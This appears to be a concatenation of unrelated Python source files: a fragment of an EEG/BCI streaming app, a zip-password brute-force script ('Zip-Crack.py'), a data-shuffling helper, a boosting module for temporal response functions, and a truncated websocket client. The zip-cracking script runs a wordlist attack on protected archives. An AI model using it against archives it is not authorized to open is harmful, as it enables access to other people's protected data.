self.xbufNotch= [0 for i in range(len(self.bNotch)-1)]
self.ybufNotch= [0 for i in range(len(self.aNotch)-1)]
def refresh_filter(self,fmin,fmax,ftype='band'):
if ftype == 'highpass':
self.b,self.a = signal.butter(4,[fmin/(self.fs/2)],ftype)
elif ftype == 'None':
self.b = np.array([1])
self.a = np.array([1])
else:
self.b,self.a = signal.butter(4,[fmin /(self.fs/2),fmax /(self.fs/2)],ftype)
self.xbuf= [0 for i in range(len(self.b)-1)]
self.ybuf= [0 for i in range(len(self.a)-1)]
def _read_tcp_thread(self):
while self.tcp == True:
logging.info('Waiting for connection')
tcpCliSock, addr = self.tcpSerSock.accept()
print('Connected from:',addr)
while self.tcp == True:
data = tcpCliSock.recv(4096)
if len(data) != 4096:
break
while self.tcp == True:
data = tcpCliSock.recv(2048)
tmp = self.__readRaw(data)
l = len(tmp)
if l > 0:
self.data += tmp
self.data = self.data[l:]
# Time Domain filter Notch
add = list()
for i in tmp:
add += [self.filt_notch(i)]
self.filteredDataNotch += add
self.filteredDataNotch = self.filteredDataNotch[l:]
# Time Domain filter
l = len(add)
for i in add:
self.filteredData += [self.filt(i)]
self.filteredData = self.filteredData[l:]
if self.save:
self.toSave.extend(list(tmp))
# Close connection
tcpCliSock.close()
def refresh(self,dt):
self.root.current_screen.ids['RealTimePlotting'].refresh()
self.root.current_screen.ids['FFT'].refresh()
def connect(self,device):
self.tcp = True
t = threading.Thread(target=self._read_tcp_thread)
t.start()
self.data = np.zeros(self.storedLen).tolist()
# self.__configure_easybci_thread()
# enable real time time-domain or/and frequency-domain plotting
Clock.schedule_interval(self.refresh,1/self.fps)
Clock.schedule_interval(self.classify, self.interval)
#self.root.ids['RealTimePlotting'].start()
#self.root.ids['FFT'].start()
return True
def disconnect(self):
self.tcp = False
# Stop event
Clock.unschedule(self.refresh)
Clock.unschedule(self.classify)
# Clear Figures
Clock.schedule_once(self.root.current_screen.ids['RealTimePlotting'].clear,1)
Clock.schedule_once(self.root.current_screen.ids['FFT'].clear,1)
self.data = np.zeros(self.storedLen).tolist()
self.filteredData = np.zeros(self.storedLen).tolist()
self.filteredDataNotch = np.zeros(self.storedLen).tolist()
def __rawData2Voltage(self, rawData,protocol,gainCoefficient=12):
""" convert rawData to exact voltage
:rawData: a list of rawData
:returns: converted voltage tupple in uV
"""
raw = np.array(rawData)
raw = raw[raw!=None]
if protocol == 'EasyBCISingleChannel':
# 2.42 is the referrence voltage of BCI device, 23 is the sampling resolution
dataVol = 2.42 / 2**23 / gainCoefficient * raw
elif protocol == 'BCISingleChannel':
dataVol = 4.033 / 2**23 / gainCoefficient * raw /2**8
dataVol = dataVol * 1e6 # convert uints to uV
return tuple(dataVol)
def __dataHex2int(self, dataHex):
""" Convert hex data of 4 bytes containing EEG data to int
:dataHex: string of length 4
:returns: int
"""
# 'i' means signed integer, '<' means little-endian
try:
data = struct.unpack('<i', dataHex)[0]
return data
except Exception:
pass
def __readRaw(self,rawData, protocol='BCISingleChannel'):
# Get data remaining in the last run
rawRemained = self.rawRemained
raw = rawRemained + rawData
dataList= []
# Manipulate raw data with given protocol
if protocol == 'EasyBCISingleChannel' or protocol == 'BCISingleChannel':
start = b'\xaa'
middle = b'\xa1'
lastIndex = 0
# find possible index by search raw data for which is the same with bytes indicating start
possibleIndex = [i for i in range(len(raw)) if raw[i:i+1] == start ]
rawLen = len(raw)
# To validate possibleIndex, we should check whether the byte indicating middle comflies.
for index in possibleIndex :
middleIndex = index + 6
try:
raw[middleIndex]
except Exception as e:
continue
if raw[middleIndex:middleIndex+1] == middle:
# middle byte does comply, so extract the pack
rawDataPack = raw[index:index+12]
try:
rawDataPack[11]
except IndexError:
break
try:
# Python 2
checkCode = sum([ord(data) for data in rawDataPack[0:-1]])%256
except Exception:
# Python 3
checkCode = sum([data for data in rawDataPack[0:-1]])%256
if ord(rawDataPack[11:]) == checkCode:
# All validation steps passed
# convert hex to int
dataHex = rawDataPack[2:6] # first data
dataList.append(self.__dataHex2int(dataHex))
dataHex = rawDataPack[7:11] # second data
dataList.append(self.__dataHex2int(dataHex))
lastIndex = index + 12
# 接触检测
connectState = (rawDataPack[1] & 0xC0) >> 6
else:
# if index + 12 <= rawLen:
logging.warning('CheckCode: %s Fail with CheckCode %s%s%s' %(rawDataPack.hex(), Fore.RED, hex(checkCode)[2:], Style.RESET_ALL ) )
# Update remaining raw data
self.rawRemained = raw[lastIndex:]
return self.__rawData2Voltage(dataList, protocol = protocol)
else:
# Exclude the last and incomplete data
raise Exception('protocol should be EasyBCISingleChannel')
if __name__ == '__main__':
# logging.basicConfig(level=logging.INFO,
# format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
# datefmt='%H:%M:%S')
# BlinkApp().run()
app = BCIApp()
try:
app.run()
except KeyboardInterrupt:
app.disconnect()
|
Zip-Crack.py
|
#!/usr/bin/env python3
# Crack Zip Files using wordlists
#Author Yehia Elghaly
import zipfile
import colorama
from colorama import Fore, Back, Style
from threading import Thread
print ("Zip Brute Force Attack")
def zip_crack(zipsec, password):
try:
password = bytes(password.encode('utf-8'))
zipsec.extractall(pwd=password)
print (Fore.GREEN + "[*] Password Found: ", str(password))
except:
pass
def Main():
zipname = input("Name of Hash file: ")
pname = input("Name of Password file: ")
if (zipname == None) | (pname == None):
print (Fore.Red + "Wrong File Name")
exit(0)
else:
pass
zipsec = zipfile.ZipFile(zipname)
passFile = open(pname)
for line in passFile.readlines():
password = line.strip('\n')
thr = Thread(target=zip_crack, args=(zipsec, password))
thr.start()
if __name__ == '__main__':
Main()
|
helper.py
|
#-*- coding: utf-8 -*-
import os
import sys
import time
import warnings
import queue as Queue
import numpy as np
import threading
import collections
def stream_shuffle_generator(generator, batch_size, shuffle_size=20000):
"""
Args:
generator: iterable dataset
batch_size: int
shuffle_size: int
"""
buffer_list = []
batch_data = []
for examples in generator():
if not isinstance(examples, list):
examples = [examples]
for data in examples:
if len(buffer_list) < shuffle_size:
buffer_list.append(data)
else:
idx = np.random.randint(0, len(buffer_list))
batch_data.append(buffer_list[idx])
buffer_list[idx] = data
if len(batch_data) >= batch_size:
yield batch_data
batch_data = []
if len(batch_data) > 0:
yield batch_data
if len(buffer_list) > 0:
np.random.shuffle(buffer_list)
start = 0
while True:
batch_data = buffer_list[start:(start + batch_size)]
start += batch_size
if len(batch_data) > 0:
yield batch_data
else:
break
class AsynchronousGenerator:
def __init__(self, generator, start=True, maxsize=0):
self.generator = generator
self.thread = threading.Thread(target=self._generatorcall)
self.q = Queue.Queue(maxsize=maxsize)
self.next = self.__next__
if start:
self.thread.start()
def __next__(self):
done, item = self.q.get()
if done:
raise StopIteration
else:
return item
def __iter__(self):
return self
def __call__(self):
return self.__iter__()
def _generatorcall(self):
for output in self.generator():
self.q.put((False, output))
self.q.put((True, None))
|
_boosting.py
|
"""
Boosting as described by David et al. (2007).
Versions
--------
7: Accept segmented data, respect segmentation (don't concatenate data)
Profiling
---------
ds = datasets._get_continuous()
y = ds['y']
x1 = ds['x1']
x2 = ds['x2']
%prun -s cumulative res = boosting(y, x1, 0, 1)
"""
import inspect
from itertools import product
from multiprocessing import Process, Queue
from multiprocessing.sharedctypes import RawArray
import os
import time
from threading import Event, Thread
import numpy as np
from numpy import newaxis
from scipy.linalg import norm
import scipy.signal
from scipy.stats import spearmanr
from tqdm import tqdm
from .._config import CONFIG
from .._data_obj import NDVar
from .._exceptions import OldVersionError
from .._utils import LazyProperty, user_activity
from ._boosting_opt import l1, l2, generate_options, update_error
from .shared import RevCorrData
# BoostingResult version
VERSION = 10 # file format (assigned in __getstate__, not __init__)
# process messages
JOB_TERMINATE = -1
# error functions
ERROR_FUNC = {'l2': l2, 'l1': l1}
DELTA_ERROR_FUNC = {'l2': 2, 'l1': 1}
class BoostingResult:
"""Result from boosting a temporal response function
Attributes
----------
h : NDVar | tuple of NDVar
The temporal response function. Whether ``h`` is an NDVar or a tuple of
NDVars depends on whether the ``x`` parameter to :func:`boosting` was
an NDVar or a sequence of NDVars.
h_scaled : NDVar | tuple of NDVar
``h`` scaled such that it applies to the original input ``y`` and ``x``.
If boosting was done with ``scale_data=False``, ``h_scaled`` is the same
as ``h``.
h_source : NDVar | tuple of NDVar
If ``h`` was constructed using a basis, ``h_source`` represents the
source of ``h`` before being convolved with the basis.
h_time : UTS
Time dimension of the kernel.
r : float | NDVar
Correlation between the measured response and the response predicted
with ``h``. Type depends on the ``y`` parameter to :func:`boosting`. For
vector data, measured and predicted responses are normalized, and ``r``
is computed as the average dot product over time.
spearmanr : float | NDVar
As ``r``, the Spearman rank correlation.
t_run : float
Time it took to run the boosting algorithm (in seconds).
error : str
The error evaluation method used.
residual : float | NDVar
The residual of the final result
- ``error='l1'``: the sum of the absolute differences between ``y`` and
``h * x``.
- ``error='l2'``: the sum of the squared differences between ``y`` and
``h * x``.
For vector ``y``, the error is defined based on the distance in space
for each data point.
delta : scalar
Kernel modification step used.
mindelta : None | scalar
Mindelta parameter used.
n_samples : int
Number of samples in the input data time axis.
scale_data : bool
Scale_data parameter used.
y_mean : NDVar | scalar
Mean that was subtracted from ``y``.
y_scale : NDVar | scalar
Scale by which ``y`` was divided.
x_mean : NDVar | scalar | tuple
Mean that was subtracted from ``x``.
x_scale : NDVar | scalar | tuple
Scale by which ``x`` was divided.
partitions : int
Numbers of partitions of the data used for cross validation.
"""
def __init__(
self,
# input parameters
y, x, tstart, tstop, scale_data, delta, mindelta, error,
basis, basis_window, partitions_arg, partitions, model, prefit,
# result parameters
h, r, isnan, spearmanr, residual, t_run,
y_mean, y_scale, x_mean, x_scale, y_info={}, r_l1=None,
# new parameters
selective_stopping=0, n_samples=None,
**debug_attrs,
):
# input parameters
self.y = y
self.x = x
self.n_samples = n_samples
self.tstart = tstart
self.tstop = tstop
self.scale_data = scale_data
self.delta = delta
self.mindelta = mindelta
self.error = error
self._partitions_arg = partitions_arg
self.partitions = partitions
self.model = model
self.prefit = prefit
self.basis = basis
self.basis_window = basis_window
self.selective_stopping = selective_stopping
# results
self._h = h
self._y_info = y_info
self.r = r
self.r_l1 = r_l1
self._isnan = isnan
self.spearmanr = spearmanr
self.residual = residual
self.t_run = t_run
self.y_mean = y_mean
self.y_scale = y_scale
self.x_mean = x_mean
self.x_scale = x_scale
self._debug_attrs = debug_attrs
for k, v in debug_attrs.items():
setattr(self, k, v)
def __getstate__(self):
return {
# input parameters
'y': self.y, 'x': self.x, 'tstart': self.tstart, 'tstop': self.tstop,
'scale_data': self.scale_data, 'delta': self.delta,
'mindelta': self.mindelta, 'error': self.error,
'partitions_arg': self._partitions_arg, 'partitions': self.partitions,
'model': self.model, 'prefit': self.prefit, 'basis': self.basis,
'basis_window': self.basis_window,
'selective_stopping': self.selective_stopping,
# results
'h': self._h, 'r': self.r, 'r_l1': self.r_l1, 'isnan': self._isnan,
'spearmanr': self.spearmanr, 'residual': self.residual,
't_run': self.t_run, 'version': VERSION,
'y_mean': self.y_mean, 'y_scale': self.y_scale,
'x_mean': self.x_mean, 'x_scale': self.x_scale,
'y_info': self._y_info, 'n_samples': self.n_samples,
**self._debug_attrs,
}
def __setstate__(self, state):
if state['version'] < 7:
state.update(partitions=None, partitions_arg=None, model=None, basis=0, basis_window='hamming')
elif state['version'] < 8:
state['partitions'] = state.pop('n_partitions')
state['partitions_arg'] = state.pop('n_partitions_arg')
if state['version'] < 9:
state['residual'] = state.pop('fit_error')
if state['version'] < 10:
state['prefit'] = None
self.__init__(**state)
def __repr__(self):
if self.x is None or isinstance(self.x, str):
x = self.x
else:
x = ' + '.join(map(str, self.x))
items = [
'boosting %s ~ %s' % (self.y, x),
'%g - %g' % (self.tstart, self.tstop),
]
for name, param in inspect.signature(boosting).parameters.items():
if param.default is inspect.Signature.empty or name == 'ds':
continue
elif name == 'debug':
continue
elif name == 'partitions':
value = self._partitions_arg
else:
value = getattr(self, name)
if value != param.default:
items.append(f'{name}={value}')
return f"<{', '.join(items)}>"
@LazyProperty
def h(self):
if not self.basis:
return self._h
elif isinstance(self._h, tuple):
return tuple(h.smooth('time', self.basis, self.basis_window, 'full') for h in self._h)
else:
return self._h.smooth('time', self.basis, self.basis_window, 'full')
@LazyProperty
def h_scaled(self):
if self.y_scale is None:
return self.h
elif isinstance(self.h, NDVar):
out = self.h * (self.y_scale / self.x_scale)
out.info = self._y_info.copy()
return out
else:
out = []
for h, sx in zip(self.h, self.x_scale):
h = h * (self.y_scale / sx)
h.info = self._y_info.copy()
out.append(h)
return tuple(out)
@LazyProperty
def h_source(self):
return self._h
@LazyProperty
def h_time(self):
if isinstance(self.h, NDVar):
return self.h.time
else:
return self.h[0].time
@LazyProperty
def _variability(self):
# variability in the data
if self.y_scale is None:
raise NotImplementedError("Not implemented for scale_data=False")
elif self.n_samples is None:
raise OldVersionError("This is an older result object which did not store some necessary information; refit the model to use this attribute")
else:
# Due to the normalization:
return self.n_samples
@LazyProperty
def proportion_explained(self):
return 1 - (self.residual / self._variability)
def _set_parc(self, parc):
"""Change the parcellation of source-space result
Notes
-----
No warning for missing sources!
"""
from .._ndvar import set_parc
if not self.r.has_dim('source'):
raise RuntimeError('BoostingResult does not have source-space data')
def sub_func(obj):
if obj is None:
return None
elif isinstance(obj, tuple):
return tuple(sub_func(obj_) for obj_ in obj)
obj_new = set_parc(obj, parc)
index = np.invert(obj_new.source.parc.startswith('unknown-'))
return obj_new.sub(source=index)
for attr in ('h', 'r', 'spearmanr', 'residual', 'y_mean', 'y_scale'):
setattr(self, attr, sub_func(getattr(self, attr)))
@user_activity
def boosting(y, x, tstart, tstop, scale_data=True, delta=0.005, mindelta=None,
error='l2', basis=0, basis_window='hamming',
partitions=None, model=None, ds=None, selective_stopping=0,
prefit=None, debug=False):
"""Estimate a linear filter with coordinate descent
Parameters
----------
y : NDVar
Signal to predict.
x : NDVar | sequence of NDVar
Signal to use to predict ``y``. Can be sequence of NDVars to include
multiple predictors. Time dimension must correspond to ``y``.
tstart : float
Start of the TRF in seconds.
tstop : float
Stop of the TRF in seconds.
scale_data : bool | 'inplace'
Scale ``y`` and ``x`` before boosting: subtract the mean and divide by
the standard deviation (when ``error='l2'``) or the mean absolute
value (when ``error='l1'``). Use ``'inplace'`` to save memory by scaling
the original objects specified as ``y`` and ``x`` instead of making a
copy.
delta : scalar
Step for changes in the kernel.
mindelta : scalar
If the error for the training data can't be reduced, divide ``delta``
in half until ``delta < mindelta``. The default is ``mindelta = delta``,
i.e. ``delta`` is constant.
error : 'l2' | 'l1'
Error function to use (default is ``l2``).
- ``error='l1'``: the sum of the absolute differences between ``y`` and
``h * x``.
- ``error='l2'``: the sum of the squared differences between ``y`` and
``h * x``.
For vector ``y``, the error is defined based on the distance in space
for each data point.
basis : float
Use a basis of windows with this length for the kernel (by default,
impulses are used).
basis_window : str | float | tuple
Basis window (see :func:`scipy.signal.get_window` for options; default
is ``'hamming'``).
partitions : int
Divide the data into this many ``partitions`` for cross-validation-based
early stopping. In each partition, ``n - 1`` segments are used for
training, and the remaining segment is used for validation.
If data is continuous, data are divided into contiguous segments of
equal length (default 10).
If data has cases, cases are divided with ``[::partitions]`` slices
(default ``min(n_cases, 10)``; if ``model`` is specified, ``n_cases``
is the lowest number of cases in any cell of the model).
model : Categorial
If data has cases, divide cases into different categories (division
for crossvalidation is done separately for each cell).
ds : Dataset
If provided, other parameters can be specified as string for items in
``ds``.
selective_stopping : int
By default, the boosting algorithm stops when the testing error stops
decreasing. With ``selective_stopping=True``, boosting continues but
excludes the predictor (one time-series in ``x``) that caused the
increase in testing error, and continues until all predictors are
stopped. The integer value of ``selective_stopping`` determines after
how many steps with error increases each predictor is excluded.
prefit : BoostingResult
Apply predictions from these estimated response functions before fitting
the remaining predictors. This requires that ``x`` contains all the
predictors that were used to fit ``prefit``, and that they be identical
to the originally used ``x``.
debug : bool
Store additional properties in the result object (increases memory
consumption).
Returns
-------
result : BoostingResult
Results (see :class:`BoostingResult`).
Notes
-----
In order to predict data, use the :func:`convolve` function::
>>> ds = datasets.get_uts()
>>> ds['a1'] = epoch_impulse_predictor('uts', 'A=="a1"', ds=ds)
>>> ds['a0'] = epoch_impulse_predictor('uts', 'A=="a0"', ds=ds)
>>> res = boosting('uts', ['a0', 'a1'], 0, 0.5, partitions=10, model='A', ds=ds)
>>> y_pred = convolve(res.h_scaled, ['a0', 'a1'], ds=ds)
The boosting algorithm is described in [1]_.
References
----------
.. [1] David, S. V., Mesgarani, N., & Shamma, S. A. (2007). Estimating
sparse spectro-temporal receptive fields with natural stimuli. Network:
Computation in Neural Systems, 18(3), 191-212.
`10.1080/09548980701609235 <https://doi.org/10.1080/09548980701609235>`_.
"""
# check arguments
mindelta_ = delta if mindelta is None else mindelta
selective_stopping = int(selective_stopping)
if selective_stopping < 0:
raise ValueError(f"selective_stopping={selective_stopping}")
elif not isinstance(debug, bool):
raise TypeError(f"debug={debug!r}")
data = RevCorrData(y, x, error, scale_data, ds)
data.apply_basis(basis, basis_window)
data.prefit(prefit)
data.initialize_cross_validation(partitions, model, ds)
n_y = len(data.y)
n_x = len(data.x)
# TRF extent in indices
tstep = data.time.tstep
i_start = int(round(tstart / tstep))
i_stop = int(round(tstop / tstep))
trf_length = i_stop - i_start
if data.segments is None:
i_skip = trf_length - 1
else:
i_skip = 0
# progress bar
n_cv = len(data.cv_segments)
pbar = tqdm(desc=f"Boosting{f' {n_y} signals' if n_y > 1 else ''}", total=n_y * n_cv, disable=CONFIG['tqdm'])
t_start = time.time()
# result containers
res = np.empty((3, n_y)) # r, rank-r, error
h_x = np.empty((n_y, n_x, trf_length))
store_y_pred = bool(data.vector_dim) or debug
y_pred = np.empty_like(data.y) if store_y_pred else np.empty(data.y.shape[1:])
# boosting
if CONFIG['n_workers']:
# Make sure cross-validations are added in the same order, otherwise
# slight numerical differences can occur
job_queue, result_queue = setup_workers(data, i_start, trf_length, delta, mindelta_, error, selective_stopping)
stop_jobs = Event()
thread = Thread(target=put_jobs, args=(job_queue, n_y, n_cv, stop_jobs))
thread.start()
# collect results
try:
h_segs = {}
for _ in range(n_y * n_cv):
y_i, seg_i, h = result_queue.get()
pbar.update()
if y_i in h_segs:
h_seg = h_segs[y_i]
h_seg[seg_i] = h
if len(h_seg) == n_cv:
del h_segs[y_i]
hs = [h for h in (h_seg[i] for i in range(n_cv)) if h is not None]
if hs:
h = np.mean(hs, 0, out=h_x[y_i])
y_i_pred = y_pred[y_i] if store_y_pred else y_pred
convolve(h, data.x, data.x_pads, i_start, data.segments, y_i_pred)
if not data.vector_dim:
res[:, y_i] = evaluate_kernel(data.y[y_i], y_i_pred, error, i_skip, data.segments)
else:
h_x[y_i] = 0
if not data.vector_dim:
res[:, y_i] = 0
if store_y_pred:
y_pred[y_i] = 0
else:
h_segs[y_i] = {seg_i: h}
except KeyboardInterrupt:
stop_jobs.set()
raise
else:
for y_i, y_ in enumerate(data.y):
hs = []
for segments, train, test in data.cv_segments:
h = boost(y_, data.x, data.x_pads, segments, train, test, i_start, trf_length, delta, mindelta_, error, selective_stopping)
if h is not None:
hs.append(h)
pbar.update()
if hs:
h = np.mean(hs, 0, out=h_x[y_i])
y_i_pred = y_pred[y_i] if store_y_pred else y_pred
convolve(h, data.x, data.x_pads, i_start, data.segments, y_i_pred)
if not data.vector_dim:
res[:, y_i] = evaluate_kernel(data.y[y_i], y_i_pred, error, i_skip, data.segments)
else:
h_x[y_i] = 0
if not data.vector_dim:
res[:, y_i] = 0
if store_y_pred:
y_pred[y_i] = 0
pbar.close()
t_run = time.time() - t_start
# fit-evaluation statistics
if data.vector_dim:
y_vector = data.y.reshape(data.vector_shape)
y_pred_vector = y_pred.reshape(data.vector_shape)
# error: distance between actual and modeled
y_pred_error = norm(y_vector - y_pred_vector, axis=1)
if error == 'l1':
errs = y_pred_error.mean(-1)
elif error == 'l2':
errs = y_pred_error.std(-1)
else:
raise RuntimeError(f"error={error!r}")
rs, rs_l1 = data.vector_correlation(y_vector, y_pred_vector)
if rs_l1 is None:
r_l1 = None
else:
r_l1 = data.package_value(rs_l1, 'l1 correlation', meas='r')
spearmanr = None
else:
rs, rrs, errs = res
r_l1 = None
spearmanr = data.package_value(rrs, 'rank correlation', meas='r')
isnan = np.isnan(rs)
rs[isnan] = 0
r = data.package_value(rs, 'correlation', meas='r')
residual = data.package_value(errs, 'fit error')
y_mean, y_scale, x_mean, x_scale = data.data_scale_ndvars()
if debug:
debug_attrs = {
'y_pred': data.package_y_like(y_pred, 'y-pred'),
}
else:
debug_attrs = {}
h = data.package_kernel(h_x, tstart)
model_repr = None if model is None else data.model
prefit_repr = None if prefit is None else repr(prefit)
return BoostingResult(
# input parameters
data.y_name, data.x_name, tstart, tstop, scale_data, delta, mindelta, error,
basis, basis_window, partitions, data.partitions, model_repr, prefit_repr,
# result parameters
h, r, isnan, spearmanr, residual, t_run,
y_mean, y_scale, x_mean, x_scale, data.y_info,
# vector results
r_l1, selective_stopping, data.y.shape[1],
**debug_attrs)
class BoostingStep:
__slots__ = ('i_stim', 'i_time', 'delta', 'e_train', 'e_test')
def __init__(self, i_stim, i_time, delta_signed, e_test, e_train):
self.i_stim = i_stim
self.i_time = i_time
self.delta = delta_signed
self.e_train = e_train
self.e_test = e_test
def boost(y, x, x_pads, all_index, train_index, test_index, i_start, trf_length,
delta, mindelta, error, selective_stopping=0, return_history=False):
"""Estimate one filter with boosting
Parameters
----------
y : array (n_times,)
Dependent signal, time series to predict.
x : array (n_stims, n_times)
Stimulus.
x_pads : array (n_stims,)
Padding for x.
train_index : array of (start, stop)
Time sample index of training segments.
test_index : array of (start, stop)
Time sample index of test segments.
trf_length : int
Length of the TRF (in time samples).
delta : scalar
Step of the adjustment.
mindelta : scalar
Smallest delta to use. If no improvement can be found in an iteration,
the first step is to divide delta in half, but stop if delta becomes
smaller than ``mindelta``.
error : str
Error function to use.
selective_stopping : int
Selective stopping.
return_history : bool
Return error history as second return value.
Returns
-------
history[best_iter] : None | array
Winning kernel, or None if 0 is the best kernel.
test_sse_history : list (only if ``return_history==True``)
SSE for test data at each iteration.
"""
delta_error_func = DELTA_ERROR_FUNC[error]
error = ERROR_FUNC[error]
n_stims, n_times = x.shape
assert y.shape == (n_times,)
h = np.zeros((n_stims, trf_length))
# buffers
y_error = y.copy()
new_error = np.empty(h.shape)
new_sign = np.empty(h.shape, np.int8)
x_active = np.ones(n_stims, dtype=np.int8)
# history
best_test_error = np.inf
history = []
i_stim = i_time = delta_signed = None
best_iteration = 0
# pre-assign iterators
for i_boost in range(999999):
# evaluate current h
e_test = error(y_error, test_index)
e_train = error(y_error, train_index)
step = BoostingStep(i_stim, i_time, delta_signed, e_test, e_train)
history.append(step)
# evaluate stopping conditions
if e_test < best_test_error:
best_test_error = e_test
best_iteration = i_boost
elif i_boost >= 2 and e_test > history[-2].e_test:
if selective_stopping:
if selective_stopping > 1:
n_bad = selective_stopping - 1
# only stop if the predictor overfits twice without intermittent improvement
undo = 0
for i in range(-2, -len(history), -1):
step = history[i]
if step.e_test > e_test:
break # the error improved
elif step.i_stim == i_stim:
if step.e_test > history[i - 1].e_test:
# the same stimulus caused an error increase
if n_bad == 1:
undo = i
break
n_bad -= 1
else:
break
else:
undo = -1
if undo:
# revert changes
for i in range(-undo):
step = history.pop(-1)
h[step.i_stim, step.i_time] -= step.delta
update_error(y_error, x[step.i_stim], x_pads[step.i_stim], all_index, -step.delta, step.i_time + i_start)
step = history[-1]
# disable predictor
x_active[i_stim] = False
if not np.any(x_active):
break
new_error[i_stim, :] = np.inf
# Basic
# -----
# stop the iteration if all the following requirements are met
# 1. more than 10 iterations are done
# 2. The testing error in the latest iteration is higher than that in
# the previous two iterations
elif i_boost > 10 and e_test > history[-3].e_test:
# print("error(test) not improving in 2 steps")
break
# generate possible movements -> training error
generate_options(y_error, x, x_pads, x_active, train_index, i_start, delta_error_func, delta, new_error, new_sign)
i_stim, i_time = np.unravel_index(np.argmin(new_error), h.shape)
new_train_error = new_error[i_stim, i_time]
delta_signed = new_sign[i_stim, i_time] * delta
# If no improvements can be found reduce delta
if new_train_error > step.e_train:
delta *= 0.5
if delta >= mindelta:
i_stim = i_time = delta_signed = None
# print("new delta: %s" % delta)
continue
else:
# print("No improvement possible for training data")
break
# abort if we're moving in circles
if step.delta and i_stim == step.i_stim and i_time == step.i_time and delta_signed == -step.delta:
break
# update h with best movement
h[i_stim, i_time] += delta_signed
update_error(y_error, x[i_stim], x_pads[i_stim], all_index, delta_signed, i_time + i_start)
else:
raise RuntimeError("Maximum number of iterations exceeded")
# print(' (%i iterations)' % (i_boost + 1))
# reverse changes after best iteration
if best_iteration:
for step in history[-1: best_iteration: -1]:
if step.delta:
h[step.i_stim, step.i_time] -= step.delta
else:
h = None
if return_history:
return h, [step.e_test for step in history]
else:
return h
def setup_workers(data, i_start, trf_length, delta, mindelta, error, selective_stopping):
n_y, n_times = data.y.shape
n_x, _ = data.x.shape
y_buffer = RawArray('d', n_y * n_times)
y_buffer[:] = data.y.ravel()
x_buffer = RawArray('d', n_x * n_times)
x_buffer[:] = data.x.ravel()
x_pads_buffer = RawArray('d', n_x)
x_pads_buffer[:] = data.x_pads
job_queue = Queue(200)
result_queue = Queue(200)
args = (y_buffer, x_buffer, x_pads_buffer, n_y, n_times, n_x, data.cv_segments, i_start, trf_length, delta, mindelta, error, selective_stopping, job_queue, result_queue)
for _ in range(CONFIG['n_workers']):
process = Process(target=boosting_worker, args=args)
process.start()
return job_queue, result_queue
def boosting_worker(y_buffer, x_buffer, x_pads_buffer, n_y, n_times, n_x, cv_segments, i_start, trf_length, delta, mindelta, error, selective_stopping, job_queue, result_queue):
if CONFIG['nice']:
os.nice(CONFIG['nice'])
y = np.frombuffer(y_buffer, np.float64, n_y * n_times).reshape((n_y, n_times))
x = np.frombuffer(x_buffer, np.float64, n_x * n_times).reshape((n_x, n_times))
x_pads = np.frombuffer(x_pads_buffer, np.float64, n_x)
while True:
y_i, seg_i = job_queue.get()
if y_i == JOB_TERMINATE:
return
all_index, train_index, test_index = cv_segments[seg_i]
h = boost(y[y_i], x, x_pads, all_index, train_index, test_index, i_start, trf_length, delta, mindelta, error, selective_stopping)
result_queue.put((y_i, seg_i, h))
def put_jobs(queue, n_y, n_segs, stop):
"Feed boosting jobs into a Queue"
for job in product(range(n_y), range(n_segs)):
queue.put(job)
if stop.isSet():
while not queue.empty():
queue.get()
break
for _ in range(CONFIG['n_workers']):
queue.put((JOB_TERMINATE, None))
def convolve(h, x, x_pads, h_i_start, segments=None, out=None):
"""h * x with time axis matching x
Parameters
----------
h : array, (n_stims, h_n_samples)
H.
x : array, (n_stims, n_samples)
X.
x_pads : array (n_stims,)
Padding for x.
h_i_start : int
Time shift of the first sample of ``h``.
segments : array (n_segments, 2)
Data segments.
out : array
Buffer for predicted ``y``.
"""
n_x, n_times = x.shape
h_n_times = h.shape[1]
if out is None:
out = np.zeros(n_times)
else:
out.fill(0)
if segments is None:
segments = ((0, n_times),)
# determine valid section of convolution (cf. _ndvar.convolve())
h_i_max = h_i_start + h_n_times - 1
out_start = max(0, h_i_start)
out_stop = min(0, h_i_max)
conv_start = max(0, -h_i_start)
conv_stop = -h_i_start
# padding
h_pad = np.sum(h * x_pads[:, newaxis], 0)
# padding for pre-
pad_head_n_times = max(0, h_n_times + h_i_start)
if pad_head_n_times:
pad_head = np.zeros(pad_head_n_times)
for i in range(min(pad_head_n_times, h_n_times)):
pad_head[:pad_head_n_times - i] += h_pad[- i - 1]
else:
pad_head = None
# padding for post-
pad_tail_n_times = -min(0, h_i_start)
if pad_tail_n_times:
pad_tail = np.zeros(pad_tail_n_times)
for i in range(pad_tail_n_times):
pad_tail[i:] += h_pad[i]
else:
pad_tail = None
for start, stop in segments:
if pad_head is not None:
out[start: start + pad_head_n_times] += pad_head
if pad_tail is not None:
out[stop - pad_tail_n_times: stop] += pad_tail
out_index = slice(start + out_start, stop + out_stop)
y_index = slice(conv_start, stop - start + conv_stop)
for ind in range(n_x):
out[out_index] += scipy.signal.convolve(h[ind], x[ind, start:stop])[y_index]
return out
def evaluate_kernel(y, y_pred, error, i_skip, segments=None):
"""Fit quality statistics
Parameters
----------
y : array, (n_samples)
Y.
y_pred : array, (n_samples)
Predicted Y.
error : str
Error metric.
i_skip : int
Skip this many samples for evaluating model fit.
segments : array (n_segments, 2)
Data segments.
Returns
-------
r : float | array
Pearson correlation.
rank_r : float | array
Spearman rank correlation.
error : float | array
Error corresponding to error_func.
"""
# discard onset
if i_skip:
assert segments is None, "Not implemented"
y = y[i_skip:]
y_pred = y_pred[i_skip:]
error_func = ERROR_FUNC[error]
index = np.array(((0, len(y)),), np.int64)
return (np.corrcoef(y, y_pred)[0, 1],
spearmanr(y, y_pred)[0],
error_func(y - y_pred, index))
|
websocket.py
|
from __future__ import annotations
import asyncio
import json
import sys
import threading
import time
import typing
import zlib
from copy import deepcopy
import aiohttp
from aiohttp.http_websocket import WSMessage, WSMsgType
if typing.TYPE_CHECKING:
from ..client import Client
class WebSocket:
# websocket opcodes
DISPATCH = 0
HEARTBEAT = 1
IDENTIFY = 2
PRESENCE = 3
VOICE_STATE = 4
VOICE_PING = 5
RESUME = 6
RECONNECT = 7
REQUEST_MEMBERS = 8
INVALIDATE_SESSION = 9
HELLO = 10
HEARTBEAT_ACK = 11
GUILD_SYNC = 12
def __init__(self, client, token: str) -> None:
self.decompress = zlib.decompressobj()
self.buffer = bytearray()
self.client: Client = client
self.token = token
self.session_id = None
self.heartbeat_acked = True
async def start(
self,
url: typing.Optional[str] = None,
*,
reconnect: typing.Optional[bool] = False
):
if not url:
url = self.client.handler.gateway()
self.socket = await self.client.handler.connect(url)
await self.receive_events()
await self.identify()
if reconnect:
await self.resume()
else:
